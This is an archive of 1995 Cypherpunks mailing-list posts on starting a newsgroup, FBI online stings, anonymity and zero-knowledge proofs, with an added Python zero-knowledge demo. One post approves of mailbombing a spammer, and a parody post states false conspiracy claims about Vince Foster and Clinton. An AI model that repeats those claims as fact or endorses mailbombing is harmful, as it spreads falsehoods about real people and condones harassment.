e-mail from CP, much of it non-crypto-related, to be annoying. If
this traffic were in a newsgroup, it would travel compressed over
my phone line, and I might use a killfile on stuff like the CO$ thread.

Anything posted to the main cypherpunks mailing list and the spun-off mailing
lists (steganography, remailers, nym servers, etc) could be posted to the
newsgroup by making one of the mail2news gateways a subscriber.

> time and thought to.  Might I suggest that a newsgroup would be a way
> to go?  There are already a number of security, privacy, and crypto
> related groups, but they tend to have their own pattern of flow, you
> know penet.fi problems on alt.privacy.anon-server, alt.privacy (dunno
> not read much), alt.security.pgp pgp usage, David Sternlight fueled
> discussions, some ITAR stuff, talk.politics.crypto, crypto politics,
> comp.org.eff.talk, there must be a few others.
...
> Reckon cypherpunks as a group has enough readers to hmm, push through
> a vote for group creation, if the majority thought it was a useful
> exercise.  A group solely for what?  cypherpunks technology, social

No vote is needed to create an alt.group: something like
'alt.security.cypherpunks' or 'alt.privacy.cypherpunks'. Just post a proposal
to alt.config, post many articles seconding the proposal, let it be discussed
for a week, then issue a newgroup.

To create a newsgroup in the 'big 8' (comp., sci., etc) one needs to deal with
unpleasant control freaks like group-advice, news.groups, and David Lawrence.
It takes up to 6 months. On the other hand, many sites that have Usenet have
comp.* but not alt.*. Their users would still have to use the mailing lists or
find another site. To create something like comp.security.cypherpunks (I think
this would be the most appropriate place, since there's already c.s.announce,
c.s.misc, and c.s.firewalls), talk to the group-advice cabal.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 16 Sep 95 05:19:36 PDT
To: cypherpunks@toad.com
Subject: HRT_web
Message-ID: <199509161219.IAA04673@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   9-16-95. NYPaper Page Oner:


   "Computer Stings Gain Favor As Arrests for Smut Increase."

      The F.B.I. has plans for its own web to fight computer
      crimes. As arrests continued in a high-tech drive
      against the peddling of child pornography on the
      nation's largest computer network, the Federal
      authorities said today that they expected to apply the
      same surveillance techniques to fight many other
      computer-related crimes, from consumer and securities
      fraud to money laundering. One way of combating these
      crimes, they said, will be for Federal agents to go
      undercover and appear as prey for unwitting criminals.
      Timothy McNally of the F.B.I. said that while the
      traditional form of surveillance included activities
      like waiting in cars and watching suspects for hours,
      "the playing field has now changed" and now requires
      agents to become more proficient in using computers to
      thwart crimes.

      But some civil liberties experts expressed alarm at the
      latest surveillance technique, saying it would have a
      chilling effect on what is now a freewheeling medium.


   HRT_web  (9 kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 16 Sep 95 09:34:31 PDT
To: cypherpunks@toad.com
Subject: "alt.cypherpunks" Newsgroup vs. Mailing List?
Message-ID: <ac8044c413021004e871@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


Should there be an "alt.cypherpunks" type of newsgroup instead of this
mailing list?

(Or, to use my punchline at the end: Let the market decide.)

At 10:26 AM 9/16/95, aba@atlas.ex.ac.uk wrote:

>One thing I have been thinking would be nice would be a USENET
>newsgroup, as mailing lists are a step away from easy access which
>some people never make.  It makes it less easy to browse and see what
>it's about, interacting with majordomo software might seem very
>intuitive to most members, but not all will be so comfortable signing
>up their mailbox (which they possibly pay for per K), and may indeed
>lack the expertise required to do the job.  There are several
>archives of cpunks, but these don't tend to be as well known as
>newsgroups.  More people might come across cypherpunks ideas, and the
>technology for remailers, disk encryptors, discussions of nym servers,
>steganography, IPSEC, etc if they were in a newsgroup, perhaps even
>within the comp, soc, or sci hierarchies.

It would be easy to create "alt.cypherpunks." I've been expecting to see it
happen for the last 3 years. It could still happen. In fact, there's been
talk of doing it (sorry for the passive "there has been talk," but I'll let
the folks talking about doing it do the talking about it here).

"Alt" groups are easy to create. (Newcomers to the list might like to know
that one of our founding members, John Gilmore, created the "alt.*" option
some years back, with "alt.drugs" I think it was.)

However, how many _newsgroups_ do any of you know of that have anywhere
near the sense of cohesion and "community" that our mailing list has?

Newsgroups encourage wider exposure to ideas, but also make "hit-and-run"
disruptions more likely. The speed bump of having to figure out how to
subscribe to a mailing list, and the expectation that one will remain "in
the community" for a while, moderates flamish behavior and encourages
people to try to learn.

Newsgroups encourage very wide browsing, which has some advantages. But
also a lack of persistent contributors and a lack of community. Mailing
lists _tend_ to have much tighter feedback loops, where most messages are
read by most members, or at least are glanced at. Newsgroups have a
different character, and topics get repeated even more often.

Interestingly, several crypto folks I know have said they have stopped
seriously using the "sci.crypt" and "talk.politics.crypto" newsgroups and
are concentrating on smaller mailing lists of co-workers and committee
members (task forces, working groups, etc.).

In some sense, the Cypherpunks list is somewhere in-between a full
newsgroup and a small working mailing list.

I could go on, but I ask instead that readers do their own investigation.

First, are there any newsgroups out there that have the atmosphere we have?
(I'm not saying there aren't any, and finding some examples to look at
might be instructive...)

Second, would the benefits of wider exposure, as "alt.cypherpunks," more
than balance out the negative effects mentioned above?

Third, is "news reading" software really that much better than "mail
reading" software? For me, for example, I use Eudora Pro and can filter all
messages by words in the thread name, by author, by mailing list name, etc.
And _saving_ messages is the default, unlike newsgroups, where I must
explicitly save an article to a file. So, for me, I have a very large
"Cypherpunks archives," whereas I don't have a large
"talk.politics.crypto" archive (partly because of the lack of community
there....).

This brings up a final point, with more than 10,000 newsgroups, including
nearly a dozen devoted to crypto, PGP, security, and anonymity, aren't
there already enough? A likely effect of "alt.cypherpunks" is this:


Subject:  Re: ITARs Worked for Less than One Day
Date:  Sun, 10 Sep 1995 00:18:38 GMT
From: david@sternlight.com (David Sternlight)
Organization: DSI/USCRPAC
Newsgroups: sci.crypt, alt.security.pgp, talk.politics.crypto,  alt.cypherpunks


That is, "alt.cypherpunks" just gets added to the cc: list of a lot of posts.

But, if anyone wants it, create it. Then people can vote with their feet.
Both the list and the newsgroup can co-exist, and if the newsgroup "wins,"
the list can be dropped.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hroller Mixmaster <hroller@c2.org>
Date: Sat, 16 Sep 95 09:53:30 PDT
To: c2.org.sdatalk@sdanet.org
Subject: Arnold Bowker and John Joslin vs. Privacy
Message-ID: <199509161647.JAA23365@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


        "Case Could End Anonymity of Computer Network Users"
               by Brian Bergstein (Associated Press)

Anonymity and freedom of speech in cyberspace are being challenged
by a Caribbean resort owner in a court case that could dramatically
restrict the rights of computer network users.

The resort owner and scuba instructor claim that they were defamed
on a computer bulletin board by an anonymous user, and they asked a
judge this week to force America Online to reveal the name of the
subscriber so they can sue the person for libel.

If Arnold Bowker and John Joslin are successful in obtaining the
name, it could have serious implications for millions of people who
use the Internet to think, write and debate in a world where they
are identified by their ideas, not their names.

Technology experts fear a morass of court cases that would hold
computer users accountable for what they say anonymously.

"What this case brings up is the specter of millions of libel suits
every time there's a disagreement on the Internet," said Daniel
Weitzner of the Center for Democracy and Technology in Washington.
"I think it's a critical issue."

Several calls seeking comment from officials at America Online were
not immediately returned Friday.

Abraham Haddad, chairman of the computer science department at
Northwestern University, said the anonymity of cyberspace should be
maintained as long as it was not being used to commit a crime.

"There's really a need to protect people's privacy as long as no
laws have been broken," Haddad said.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 16 Sep 95 09:50:13 PDT
To: cypherpunks@toad.com
Subject: Re: Explaining Zero Knowledge to your children
Message-ID: <ac804c8a14021004bc1f@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:10 AM 9/15/95, hallam@w3.org wrote:
>The cave analogy sucks.
>
>The way I tried to explain Zero Knowledge is this:
>
>
>Imagine that you have a duplicator device which you want to sell, you don't
>want to explain why it works to the buyer however since then they would
>just make their own (patents have been abolished by this time). You also don't
>want the buyer to be able to prove to anyone else that you have a duplicator.
>
>So what you do is you play the "what hand is it in game" and you do this
>with a
>10$ bill provided by the buyer and who records its serial number. You hold the
>original article in one hand and the duplicate in the other. The buyer chooses
>one hand, you show the article in that hand. The buyer knows you had a 50:50
>chance of a lucky guess so you do it again, each time the probability of
>getting
>it right by a lucky guess halves. After 10 tries or so it is virtually certain
>that you were not faking.
>
>
>Any better ideas...

Clever, but I think it's missing an important element of zero knowledge
interactive proof systems. For example, why not simply open _both_ hands?

By opening both hands one shows immediately that one has a duplicator, but
does not show how the duplicator works. The same results are obtained with
perfect certainty in _one_ round that the ZKIPS approach takes N rounds (as
N gets large).

Granted, this fails the " don't want the buyer to be able to prove to
anyone else that you have a duplicator" test, but I don't think that is
central to ZKIPS. I think a more important test is "don't show others how
to make matter duplicators."

Matter duplicators are "self-demonstrating" without revealing how they
work, so they don't fit the model of (or create a need for) software-based
ZKIPS.

For example, in the Hamiltonian cycle example, the Prover demonstrates to
the Skeptic either the set of nodes, with the nodes labelled, or a
Hamiltonian cycle, with the nodes unlabelled. If he shows _both_ the set of
nodes _and_ a Hamiltonian cycle, then he's given the Skeptic the whole
shebang. In Phill's example, he's just taught the Skeptic "how to make a
matter duplicator."


But I applaud the creation of new and simpler examples, and maybe I'm wrong
and Phill's example captures the essence of zero knowledge interactive
proofs. I'll think about it some more.

Comments?

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

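The Hamiltonian cycle proof mentioned in the message above, as an added
example that is not part of the original post or of any list member's code.
Each round the Prover commits to a relabelled copy of the graph, and the
Skeptic asks either for the labelling (whole graph opened) or for the cycle
(only its edges opened, labelling withheld). The SHA-256 hash commitment, the
sample graph and all names are assumptions made for this illustration.

```python
import hashlib
import secrets

_rng = secrets.SystemRandom()

def commit(bit):
    """Hash commitment to one bit (stand-in scheme): (digest, opening)."""
    nonce = secrets.token_bytes(16)
    return hashlib.sha256(nonce + bytes([bit])).digest(), (nonce, bit)

def opens_to(digest, opening):
    nonce, bit = opening
    return hashlib.sha256(nonce + bytes([bit])).digest() == digest

def pair(u, v):
    return (u, v) if u < v else (v, u)

def cycle_pairs(cyc):
    return [pair(cyc[k], cyc[(k + 1) % len(cyc)]) for k in range(len(cyc))]

class Prover:
    """Knows a Hamiltonian cycle of the public graph and never reveals it."""
    def __init__(self, n, edges, cycle):
        self.n, self.edges, self.cycle = n, edges, cycle

    def _commit_graph(self, edge_set):
        # One commitment per vertex pair: 1 if the pair is an edge, else 0.
        self.openings, commitments = {}, {}
        for i in range(self.n):
            for j in range(i + 1, self.n):
                bit = int((i, j) in edge_set)
                commitments[(i, j)], self.openings[(i, j)] = commit(bit)
        return commitments

    def commit_round(self):
        self.perm = list(range(self.n))
        _rng.shuffle(self.perm)                      # fresh relabelling per round
        self.hidden_cycle = [self.perm[v] for v in self.cycle]
        relabelled = {pair(self.perm[u], self.perm[v]) for u, v in self.edges}
        return self._commit_graph(relabelled)

    def respond(self, challenge):
        if challenge == 0:                           # labelled nodes, no cycle
            return self.perm, self.openings
        shown = cycle_pairs(self.hidden_cycle)       # cycle, nodes unlabelled
        return self.hidden_cycle, {p: self.openings[p] for p in shown}

class Cheater(Prover):
    """Knows no cycle: commits to a made-up cycle graph and hopes for challenge 1."""
    def __init__(self, n, edges):
        super().__init__(n, edges, cycle=None)

    def commit_round(self):
        self.perm = list(range(self.n))
        self.hidden_cycle = list(range(self.n))
        _rng.shuffle(self.hidden_cycle)
        return self._commit_graph(set(cycle_pairs(self.hidden_cycle)))

def skeptic_check(n, edges, commitments, challenge, response):
    if len(commitments) != n * (n - 1) // 2:
        return False
    if challenge == 0:
        # Every commitment must open to the public graph under the permutation.
        perm, openings = response
        if sorted(perm) != list(range(n)):
            return False
        expected = {pair(perm[u], perm[v]) for u, v in edges}
        return all(p in openings and opens_to(d, openings[p])
                   and openings[p][1] == int(p in expected)
                   for p, d in commitments.items())
    # Challenge 1: the opened edges must form a cycle through every vertex once.
    cyc, openings = response
    if sorted(cyc) != list(range(n)):
        return False
    return all(p in openings and openings[p][1] == 1
               and opens_to(commitments[p], openings[p])
               for p in cycle_pairs(cyc))

def run_protocol(prover, n, edges, rounds):
    """True if the prover survives every round; a cheater survives with 2^-rounds."""
    for _ in range(rounds):
        commitments = prover.commit_round()
        challenge = secrets.randbelow(2)
        if not skeptic_check(n, edges, commitments, challenge,
                             prover.respond(challenge)):
            return False
    return True

# Constructed sample graph: a 5-cycle plus two chords; CYCLE is the secret.
N = 5
EDGES = [(0, 1), (1, 2), (2, 3), (3, 4), (4, 0), (0, 2), (1, 3)]
CYCLE = [0, 1, 2, 3, 4]

if __name__ == "__main__":
    print("honest prover, 20 rounds:", run_protocol(Prover(N, EDGES, CYCLE), N, EDGES, 20))
    print("cheater, 20 rounds:      ", run_protocol(Cheater(N, EDGES), N, EDGES, 20))
```

Opening both halves of one round, which is the "open both hands" case May
raises, would hand the Skeptic the relabelling and the relabelled cycle
together, and with them the cycle in the original graph.
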





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dsc@swcp.com (Dar Scott)
Date: Sat, 16 Sep 95 08:57:10 PDT
To: cypherpunks@toad.com
Subject: (Noise) X-Files anarchist
Message-ID: <v01510100ac80a19afbbc@[198.59.115.139]>
MIME-Version: 1.0
Content-Type: text/plain


I hardly watch TV ...blah, blah..., but I saw X-files last night.  A very
minor character was a cryptohacker who--to his surprise--brute-forced a
military key for some files.  He was described as an anarchist.

To _my_ surprise, this anarchist was not associated with violence or
lunatic ravings.  He was shown as reading a book entitled something like
Survey of Modern Conspiracy Theories.  I see this as an improvement in the
stereotype of computer-associated anarchists.  And this I see as a good
thing, since I think there is a lot that could be learned from anarchists.


I think the character was killed, but I may have missed something.

Dar

===========================================================
Dar Scott               Home phone: +1 505 299 9497

Dar Scott Consulting         Voice: +1 505 299 5790
8637 Horacio Place NE        Email: darscott@aol.com
Albuquerque, NM  87111              dsc@swcp.com
                               Fax: +1 505 898 6525
http://www.swcp.com/~correspo/DSC/DarScott.html
===========================================================






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 16 Sep 95 09:58:18 PDT
To: cypherpunks@toad.com
Subject: Re: (Noise) X-Files anarchist
Message-ID: <ac80504e150210049e8b@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:56 PM 9/16/95, Dar Scott wrote:
>I hardly watch TV ...blah, blah..., but I saw X-files last night.  A very
>minor character was a cryptohacker who--to his surprise--brute-forced a
>military key for some files.  He was described as an anarchist.
>
>To _my_ surprise, this anarchist was not associated with violence or
>lunatic ravings.  He was shown as reading a book entitled something like
>Survey of Modern Conspiracy Theories.  I see this as an improvement in the
>stereotype of computer-associated anarchists.  And this I see as a good
>thing, since I think there is a lot that could be learned from anarchists.

Vince Foster was technical advisor to "The X-Files." The NSA had him killed
at Fort Darcy because he was getting too close to the Bilderbergers and
their control of the secret UFO technology first given to the Nazis and
then transferred to Winnemucca, Nevada as part of Operation Paperclip.

The pilot who flew Bush in an SR-71 to negotiate with the Iranians to delay
the release of the hostages and so defeat Carter in 1980 is also the author
of "Nomenclature of a Conspiracy Cabal," one of the books shown in that
episode.

President Clinton, at the Underground White House near Edwards Air Force
Base, OKed the hit on Foster, even though "The X-Files" was one of his
favorite shows. The Greys must be appeased.

--Klaus! von Future Prime, who actually has several dozen books on these
and similar subjects






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@alpha.c2.org (Anonymous)
Date: Sat, 16 Sep 95 10:05:30 PDT
To: cypherpunks@toad.com
Subject: Re: SPAM bait
In-Reply-To: <9509152041.AA21715@argosy.MasPar.COM>
Message-ID: <199509161700.KAA24077@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


David G. Koontz (koontz@MasPar.COM) wrote:
: To: janet.dove@ledip.py
: Subject: Re:  ===>> FREE 1 yr. Magazine Sub sent worldwide- 315+ Popular USA Tit

Don't worry, "Janet Dove", or actually sanghi3@grfn.org got mailbombed
severely for this one.  I'm just glad he doesn't know how to use remailers.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 16 Sep 95 10:18:54 PDT
To: cypherpunks@toad.com
Subject: Re: Digital Fingerprinting
Message-ID: <ac80562f16021004000e@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:57 AM 9/16/95, Alan Olsen wrote:

>I seem to remember a software piracy case from a number of years back.  The
>case was settled by Apple showing that their code had been copied by the
>copyright "easteregg" hidden in the roms.  Made for a quick and effective
>demonstration in court.  (The story may be apocryphal, but it makes for an
>example as to how such things do have a (supposed) valid use in protecting
>code from being snagged by  other companies.)

And someone just cited the same (or very similar) example, where the "quick
and effective demonstration" nevertheless resulted (they said) in an
acquittal.

So, which way did it go?

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Sat, 16 Sep 95 03:27:07 PDT
To: dcl@panix.com
Subject: Re: CYPHERPUNK considered harmful
Message-ID: <14439.9509161026@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



David Lambert <dcl@panix.com> writes:
> 
> Peter Trei <trei@process.com> wrote:
> 
> >      Terms like 'cypherpunk' and 'cryptoanarchy' tend to pigeonhole us as
> > nutcases for many people, and are a barrier to getting our ideas
> > across. I'm not saying this pigeonholing is correct - in fact I despise
> > people who judge a book by its cover, but so many people DO make such
> > snap judgements that we need to take this into account when talking to
> > the general public.
> 
> Two of the responses to the "An opportunity..." post unapologetically
> admitted that they refused to read the text of the message due to the
> presence of the word "cypherpunk" in the first sentence.
> 
> Shows you what we're up against.
> 
> BTW, I'm not for changing the name of the list, but I do see the logic
> in a more establishment-friendly name to use when lobbying the public.

There is likely some truth to the cypherpunk turning some people off
before they listen, but also as has already been said 'cypherpunks'
has its advantages too: catchy, gets the media imagination, and has an
established reputation, and set of accomplishments.

One thing I have been thinking would be nice would be a USENET
newsgroup, as mailing lists are a step away from easy access which
some people never make.  It makes it less easy to browse and see what
it's about, interacting with majordomo software might seem very
intuitive to most members, but not all will be so comfortable signing
up their mailbox (which they possibly pay for per K), and may indeed
lack the expertise required to do the job.  There are several
archives of cpunks, but these don't tend to be as well known as
newsgroups.  More people might come across cypherpunks ideas, and the
technology for remailers, disk encryptors, discussions of nym servers,
steganography, IPSEC, etc if they were in a newsgroup, perhaps even
within the comp, soc, or sci hierarchies.

One thing I have discovered in myself is a reluctance to subscribe to
too many mailing lists, as the volume, and management of the resulting
traffic piped your way can be overwhelming (yes I know there are
various filters to split off traffic into separate mbox files).  I
think it is a shame that things like the nym server discussion which
sounded very interesting to me got split off into a separate group,
I'd just as soon see the discussion here, for reluctance to subscribe
to yet more groups reasons, and because it sounded like it wasn't very
high volume anyway.  Same for the stego group discussions.  If it's
all in one place at least I can skim that for interesting things.
Both of those discussions I think would contribute to the signal ratio
here.

But, Peter's stated aims sound useful, of promulgating cypherpunks
technology, and ideas to as large an audience as possible.  Definitely
a very important aim, and one that lots of people already devote some
time and thought to.  Might I suggest that a newsgroup would be a way
to go?  There are already a number of security, privacy, and crypto
related groups, but they tend to have their own pattern of flow, you
know penet.fi problems on alt.privacy.anon-server, alt.privacy (dunno
not read much), alt.security.pgp pgp usage, David Sternlight fueled
discussions, some ITAR stuff, talk.politics.crypto, crypto politics,
comp.org.eff.talk, there must be a few others.

Peter's FAQ like document was very nicely worded for avoidance of any
connotations of conspiracy or 'punkery' which might put off the less
adventurous souls, the more conservative.  How about it?

Reckon cypherpunks as a group has enough readers to hmm, push through
a vote for group creation, if the majority thought it was a useful
exercise.  A group solely for what?  cypherpunks technology, social
impacts and education, a place where someone would go with security
questions, and to learn about the future of personal and corporate
security on the net.  If a few people frequented it, with the sort of
diligence that a number of people spend time contributing to the
alt.security.pgp group, and a useful set of pointers, and FAQs posted
frequently, it might become a useful resource.

One URL which I haven't seen pushed all that much which impressed me a
lot for a very comprehensive list of cypherpunks technology, what it
is and where to get it was Tatu Ylonen's pages on crypto, and crypto
apps:

	http://www.cs.hut.fi/ssh/crypto/

A resource that would look good with a support newsgroup for
discussion of just such technology.

I would have thought that if anyone was interested to set up such a
group (Peter? - your initiative?), that you could tone down the
'cypherpunks' name if you felt it would further the cause of giving
the newsgroup wider appeal.  I mean perhaps you would mention
'cypherpunks', 'the mailing list', near the end of the FAQ as further
resources, and a forum for active discussion, explaining the name
first, so that people don't get put off, after they've got that far
(read all through your FAQ), presumably they'll be less inclined to
let a label bother them.

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Sat, 16 Sep 95 08:33:50 PDT
To: Charles Lewton <clewton@netcom.com>
Subject: Re: Linking = Showing = Transferring?
In-Reply-To: <Pine.SUN.3.91.950915082125.12633F-100000@netcom17>
Message-ID: <Pine.SUN.3.91.950916113300.25537B-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain




On Fri, 15 Sep 1995, Charles Lewton wrote:

> On Fri, 15 Sep 1995, Duncan Frissell wrote:
> 
> > 
> > On Thu, 14 Sep 1995, Lucky Green wrote:
> > 
> > > The answer is trivial. If it pisses off the fascists in power enough, you
> > > go to jail or get killed.
> 
> > 
> > As a libertarian nut, I bow to no one in my love of extreme statements.  
> > But I feel compelled to squash this particular notion whenever I see it.
> > Randy Weaver really pissed off the Feds and did not go to jail (except 
> > during trial) and received a $3.1 million settlement.  (.1 to him, 3 to 
> > the kids but they are minors).
> > 
> > DCF
> > 
> 
> Not quite squashed, Duncan.  Bullet placement (poor by some standards)
> is all that prevented Mr. Weaver from croaking like his unfortunate wife.
> She is said to have "pissed off" the feds but was not charged with a
> single actionable item yet she remains quite dead.
> 
> Unless I have missed something somewhere, no TLA is concerned in the slightest
> with individual liberty.  That notion should keep a rational person awake
> nights.

Much as I like the concept of checks and balances, this is an example of 
the evils of power balanced and checked ex post, and not ex ante.


> 
> Chuck
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@cybrspc.mn.org (Roy M. Silvernail)
Date: Sat, 16 Sep 95 17:16:04 PDT
To: aba@dcs.exeter.ac.uk
Subject: Re: CYPHERPUNK considered harmful
In-Reply-To: <14439.9509161026@exe.dcs.exeter.ac.uk>
Message-ID: <950916.115448.5Q5.rnr.w165w@cybrspc.mn.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, aba@dcs.exeter.ac.uk writes:

> One thing I have been thinking would be nice would be a USENET
> newsgroup, as mailing lists are a step away from easy access which
> some people never make.

That's a feature, not a bug.  Unless the group was moderated, I predict
the S/N ratio to be <= 0.  Witness the crap in alt.2600.

The mailing list, as someone said before me, works as a limited
pre-screening system.  Given the nature of the list's focus and
discussion, I think a newsgroup would end up being a stable attractor
for the clue-deficit crowd.  Not something I'd find useful.
- -- 
           Roy M. Silvernail     [ ]      roy@cybrspc.mn.org
PGP Public Key fingerprint =  31 86 EC B9 DB 76 A7 54  13 0B 6A 6B CC 09 18 B6
                Key available from pubkey@cybrspc.mn.org

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMFsCyhvikii9febJAQFJVQP/VDKh+Mb8FFsm85IqOmYOZ82gam7Lmbwp
+E3sSOnnRUVQAiT8vbSs/qeA3ozZEF6Oi++CVYzPh/S8zLUufoUqSGuhOwXi2Z3R
XH1CTkXBYccuQkd7wG8Sm7Q9sN+zd8iR4byWQrknlSua9czivNjHhUNDxgdwSR7p
yI3GCz1L244=
=uYVL
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Sat, 16 Sep 95 09:00:01 PDT
To: "David C. Lambert" <dcl@panix.com>
Subject: Re: CYPHERPUNK considered harmful
In-Reply-To: <199509152013.QAA18005@panix.com>
Message-ID: <Pine.SUN.3.91.950916114256.25537C-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain




On Fri, 15 Sep 1995, David C. Lambert wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> Peter Trei <trei@process.com> wrote:
> 
> >      Terms like 'cypherpunk' and 'cryptoanarchy' tend to pigeonhole us as
> > nutcases for many people, and are a barrier to getting our ideas
> > across. I'm not saying this pigeonholing is correct - in fact I despise
> > people who judge a book by its cover, but so many people DO make such
> > snap judgements that we need to take this into account when talking to
> > the general public.
> 
> Two of the responses to the "An opportunity..." post unapologetically
> admitted that they refused to read the text of the message due to the
> presence of the word "cypherpunk" in the first sentence.
> 
> Shows you what we're up against.
> 
> BTW, I'm not for changing the name of the list, but I do see the logic
> in a more establishment-friendly name to use when lobbying the public.

So found the propaganda arm of the cypherpunks with a snazzy and PC name.

Distribute watered down cypherpunk "teachings" in more benign forms which 
hide their true (Ohhh! Scary!) potential in an effort to make them commonly 
acceptable to joe sixpack.


Can't we all see what road this leads down?

At the risk of politicizing the issue, I wouldn't be the first to call this 
"left-speak" or "term-sanitizing."

Really the core issue is that the citizens of their respective nations 
need to either:

1>  See cryptography for the important individual rights issue that it is 
and latch on to the basic desire for free and unmonitored commerce and 
exchange without censorship or observation.

or

2>  Decide that they are not interested in the issues because these 
issues are too radical, or simply because their own political ideas fall left
(or statist) of this spectrum.


Personally, and being quite defeatist and selfish, while I would like a 
widespread population wide strong crypto system aesthetically, in the end I 
don't care if every joe sixpack on the planet uses real crypto, just so long as 
those I am to conduct commerce (of data or goods) with do.

The final judgement will be in the advantage of velocity and security of 
transactions and the wealth that this "allocates" to those wise enough to 
adopt crypto exchange systems.  Evolution in action.  If this makes me 
elitist, so be it.

Granted, there are non-cryptoanarchy applications to crypto which I am 
ignoring.  My fingers are tired and I believe them incidental.

> 
> David C. Lambert
> dcl@panix.com
> (finger for PGP public key)
> 
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
> 
> iQCVAwUBMFneAqpplsfgM88VAQE+5wP9GZrIoComyFDeQ6brTLJwZ2oamry3IfC7
> XhlqMlAZnC2b1w521nm085nZKtO9/Ru9Fw3BllPinG8nGcBggr9zkH4Ba+Zbezh0
> FKK29d7wFGQz1d5JfyYCZhl4dTBdbpnU4jd5Rb27XtvP9livAeR/HIwNAJMccSCX
> qO/kxlVRRZg=
> =1Lxr
> -----END PGP SIGNATURE-----
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Sat, 16 Sep 95 09:57:15 PDT
To: cypherpunks@toad.com
Subject: alt.cypherpunks
Message-ID: <199509161706.MAA03037@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi all,

My vote is to let the folks on usenet sink in their own quagmire of
ignorance about what we do. This list is no secret. If somebody wants to
get into the 'game' let them bloody well subscribe. 

Ta ta.

                                          Jim Choate
                                          CyberTects
                                          ravage@einstein.ssz.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "syrinx@c2.org (Syrinx Anonymous Remailer)" <syrinx@c2.org>
Date: Sat, 16 Sep 95 12:30:08 PDT
To: jpunix.com.remailer-operators@c2.org
Subject: RE: Commercial Mixmaster
Message-ID: <199509161921.MAA05294@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


nelson@crynwr.com (Russell Nelson) wrote:

> There *will* always be a free version of the client with source
> code, but the proprietary improvements will probably not be merged
> into the free version.  Lance, and only Lance, as copyright holder,
> has the publish the code under a different copyright.  It's the same
> thing that Phil Z. did with ViacryptPGP.

It's not the same thing, though.  PGP 2.6.2 and PGP 2.7 are
compatible.  You can compile 2.6.2 from the sources and have it
interoperate with Viacrypt 2.7.

The concern is not "commercialization", per se, but rather the use
of "commercialization" as an excuse to build in "proprietary"
features (Back doors?) for which no corresponding source code is
involved.

Since no one has made a good case for there even being a COMMERCIAL
market for Mixmaster, could there be other motives?  Without
building an anonymous e-$ infrastructure first, there's no way to
even charge for the use of a remailing service without sacrificing
anonymity, even if people were willing to pay to have messages
anonymously remailed.

No, I'm not accusing Lance.  But if he no longer has the time to
support Mixmaster, then perhaps some other crypto-friendly group
should take over the task and keep it an OPEN system, with source
code available.  In fact, even freezing Mixmaster as is would be
preferable to "improvements" that people don't/can't trust.

True, they *COULD* provide source code, but how many commercial
products come with complete source code?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Sat, 16 Sep 95 09:31:09 PDT
To: Peter Trei <trei@process.com>
Subject: Re: CYPHERPUNK considered harmful.
In-Reply-To: <9509151915.AA16093@toad.com>
Message-ID: <Pine.SUN.3.91.950916122624.25537D-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain




